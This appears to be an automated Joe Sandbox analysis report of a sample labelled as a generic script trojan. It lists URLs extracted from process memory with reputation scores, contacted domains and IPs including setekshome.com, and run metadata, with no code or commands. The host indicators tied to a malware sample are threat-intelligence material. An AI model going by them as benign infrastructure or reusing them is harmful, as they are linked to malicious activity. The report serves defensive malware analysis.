http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
https://cleanbrowsing.org/privacyCleanBrowsing0%Avira URL Cloudsafe
https://public.dns.iij.jp/IIJ0%VirustotalBrowse
https://www.nic.cz/odvr/CZ.NIC0%VirustotalBrowse
https://nextdns.io/privacy0%Avira URL Cloudsafe
https://support.google.com/chromebook?p=app_intent0%Avira URL Cloudsafe
http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
https://alekberg.net/privacyalekberg.net0%Avira URL Cloudsafe
https://developers.google.com/speed/public-dns/privacyGoogle0%Avira URL Cloudsafe
https://cleanbrowsing.org/privacyCleanBrowsing0%VirustotalBrowse
https://wns.windows.com/0%VirustotalBrowse
https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd4%VirustotalBrowse
https://support.google.com/chromebook?p=app_intent0%VirustotalBrowse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%Avira URL Cloudsafe
https://www.google.com/chrome/privacy/eula_text.htmlG1%VirustotalBrowse
https://alekberg.net/privacyalekberg.net0%VirustotalBrowse
https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.00%Avira URL Cloudsafe
https://dns64.dns.google/dns-query0%Avira URL Cloudsafe
https://nextdns.io/privacy0%VirustotalBrowse
https://doh.opendns.com/dns-query0%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
https://dns.quad9.net/dns-query0%Avira URL Cloudsafe
https://developers.google.com/speed/public-dns/privacyGoogle0%VirustotalBrowse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%VirustotalBrowse
https://doh.opendns.com/dns-query0%VirustotalBrowse
https://dns64.dns.google/dns-query0%VirustotalBrowse
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl0%Avira URL Cloudsafe
https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query0%Avira URL Cloudsafe
https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.00%VirustotalBrowse
https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC0%Avira URL Cloudsafe
https://public.dns.iij.jp/dns-query0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=frRaccourci0%Avira URL Cloudsafe
https://support.google.com/chrome/a/?p=block_warn0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=zh-CN0%Avira URL Cloudsafe
https://alekberg.net/privacy0%Avira URL Cloudsafe
https://dnsnl.alekberg.net/dns-query0%Avira URL Cloudsafe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivity0%Avira URL Cloudsafe
https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::300%Avira URL Cloudsafe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
https://www.pollensense.com/0%Avira URL Cloudsafe
https://chromium.dns.nextdns.io0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
162.159.61.3
truefalseunknown
clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com
3.222.214.216
truefalseunknown
ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com
52.48.38.99
truefalseunknown
socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com
52.30.21.185
truefalseunknown
setekshome.com
185.111.234.27
truefalseunknown
sockjs-eu.pusher.com
unknown
unknownfalseunknown
ws-eu.pusher.com
unknown
unknownfalseunknown
www.setekshome.com
unknown
unknownfalseunknown
stats.pusher.com
unknown
unknownfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 0000001D.00000000.1774067541.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://support.google.com/chrome/answer/6098869zh-CN.pak.0.dr, fr.pak.0.drfalse
  • URL Reputation: safe
unknown
https://dns10.quad9.net/dns-querydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.google.com/chrome/privacy/eula_text.htmlzh-CN.pak.0.drfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://doh.familyshield.opendns.com/dns-querydefender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://doh.cleanbrowsing.org/doh/security-filterdefender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://public.dns.iij.jp/defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://excel.office.comexplorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://photos.google.com/settings?referrer=CHROME_NTPzh-CN.pak.0.dr, fr.pak.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://doh.cox.net/dns-querydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pddefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.nic.cz/odvr/defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dns11.quad9.net/dns-querydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrlzh-CN.pak.0.dr, fr.pak.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 00000017.00000002.1646408112.0000023AB1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1646408112.0000023AB13EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1612107420.0000023AA2CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://www.nic.cz/odvr/CZ.NICdefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://wns.windows.com/explorer.exe, 0000001D.00000000.1776329895.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.google.com/chrome/privacy/eula_text.htmlGfr.pak.0.drfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000017.00000002.1612107420.0000023AA1381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACD801000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://public.dns.iij.jp/IIJdefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000001D.00000000.1779503148.000000000C400000.00000004.00000001.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://cleanbrowsing.org/privacyCleanBrowsingdefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://nextdns.io/privacydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://word.office.comexplorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://support.google.com/chromebook?p=app_intentzh-CN.pak.0.dr, fr.pak.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://alekberg.net/privacyalekberg.netdefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://go.micropowershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACE537000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Iconpowershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://developers.google.com/speed/public-dns/privacyGoogledefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dns64.dns.google/dns-querydefender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://doh.opendns.com/dns-querydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exefalse
  • URL Reputation: safe
unknown
https://dns.quad9.net/dns-querydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://outlook.comexplorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://github.com/Pester/Pesterpowershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrlzh-CN.pak.0.dr, fr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-querydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://android.notify.windows.com/iOSexplorer.exe, 0000001D.00000000.1776329895.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebCdefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://public.dns.iij.jp/dns-querydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://chrome.google.com/webstore?hl=frRaccourcifr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://support.google.com/chrome/a/?p=block_warnfr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://chrome.google.com/webstore?hl=zh-CNzh-CN.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://alekberg.net/privacydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dnsnl.alekberg.net/dns-querydefender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivityzh-CN.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000001D.00000000.1776329895.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.pollensense.com/explorer.exe, 0000001D.00000000.1774067541.00000000071A4000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://chromium.dns.nextdns.iodefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://contoso.com/Licensepowershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://dns.google/dns-querydefender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://schemas.microexplorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775864991.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775178622.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775842222.0000000008810000.00000002.00000001.00040000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://passwords.google.comComptefr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://int3.de/elevate.exe.0.drfalse
  • Avira URL Cloud: safe
unknown
https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflaredefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://myactivity.google.com/zh-CN.pak.0.dr, fr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://perfetto.dev/docs/contributing/getting-started#community).Nodefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://doh.quickline.ch/dns-querydefender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://chrome-devtools-frontend.appspot.com/defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?ufr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://developers.google.com/speed/public-dns/privacydefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://chromeenterprise.google/policies/#BrowserSwitcherUrlListzh-CN.pak.0.dr, fr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://oneget.orgXpowershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://policies.google.com/zh-CN.pak.0.dr, fr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://doh-02.spectrum.com/dns-querydefender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdndefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.quad9.net/home/privacy/Quad9defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://perfetto.dev/docs/contributing/getting-started#community).defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://nuget.org/NuGet.exepowershell.exe, 00000017.00000002.1646408112.0000023AB1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1646408112.0000023AB13EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1612107420.0000023AA2CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://chromeenterprise.google/policies/#BrowserSwitcherEnabledzh-CN.pak.0.dr, fr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://odvr.nic.cz/dohdefender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://chrome.google.com/webstore/category/extensionszh-CN.pak.0.dr, fr.pak.0.drfalse
  • Avira URL Cloud: safe
unknown
https://doh.cleanbrowsing.org/doh/family-filterdefender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpfalse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
162.159.61.3
chrome.cloudflare-dns.comUnited States
13335CLOUDFLARENETUSfalse
99.81.234.0
unknownUnited States
16509AMAZON-02USfalse
3.222.214.216
clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.comUnited States
14618AMAZON-AESUSfalse
52.30.21.185
socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.comUnited States
16509AMAZON-02USfalse
185.111.234.27
setekshome.comTurkey
51557TR-FBSTRfalse
52.48.38.99
ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.comUnited States
16509AMAZON-02USfalse
172.64.41.3
unknownUnited States
13335CLOUDFLARENETUSfalse

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1487580
Start date and time:2024-08-04 16:22:27 +02:00
Joe Sandbox product:CloudBasic
